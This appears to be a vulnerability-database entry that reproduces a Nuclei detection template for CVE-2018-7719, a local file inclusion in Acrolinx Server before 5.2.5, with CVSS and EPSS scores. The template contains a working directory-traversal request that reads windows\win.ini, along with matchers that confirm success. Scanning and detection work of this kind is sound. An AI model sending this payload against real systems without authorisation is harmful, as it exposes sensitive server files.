Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-7719
HistoryNov 24, 2021 - 1:18 p.m.

Acrolinx Server <5.2.5 - Local File Inclusion

2021-11-2413:18:06
ProjectDiscovery
github.com
5
cve2018
acrolinx
lfi
packetstorm
exploit-db
directory traversal

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.092

Percentile

94.7%

Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
id: CVE-2018-7719

info:
  name: Acrolinx Server <5.2.5 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: |
    Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
  remediation: |
    Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
    - https://support.acrolinx.com/hc/en-us/articles/213987685-Acrolinx-Server-Version-5-1-including-subsequent-service-releases-
    - https://www.exploit-db.com/exploits/44345/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7719
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-7719
    cwe-id: CWE-22
    epss-score: 0.09221
    epss-percentile: 0.94118
    cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: acrolinx
    product: acrolinx_server
  tags: cve2018,cve,acrolinx,lfi,packetstorm,edb

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4a0a00473045022100be13e106741925c8c5b24230ffb732b7931c6ab0329c975414c1ed2c4eab2e56022043b316a07452c2ebb95fa1afef7806f36c3b802ea558962062a0fd259fa9f192:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.092

Percentile

94.7%